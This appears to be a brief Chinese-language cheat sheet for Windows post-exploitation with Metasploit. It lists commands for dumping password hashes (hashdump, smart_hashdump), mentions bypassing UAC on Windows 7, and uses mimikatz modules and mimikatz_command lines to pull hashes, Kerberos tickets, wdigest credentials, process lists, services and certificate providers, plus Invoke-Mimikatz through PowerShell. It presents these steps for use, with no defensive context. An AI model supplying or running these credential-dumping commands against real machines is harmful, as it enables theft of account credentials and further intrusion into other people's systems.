使用hashdump抓取密码(需要系统管理权限)

 

另外一个更强大的模块 smart_hashdump

 

如果目标是win7 就需要先绕过UAC　

 

还可以使用msf内置的mimikatz抓取hash

msv

 

kerberos 抓取系统票据

 

 

wdigest 获取系统账户信息

 

mimikatz_command -f samdump::hashed 抓取hash

mimikatz_command -f handle::list 查看进程

mimikatz_command -f service::list windows 服务

mimikatz_command -f crypto::listProviders 查看系统证书 支持PowerShell调用(Invoke-Mimikatz)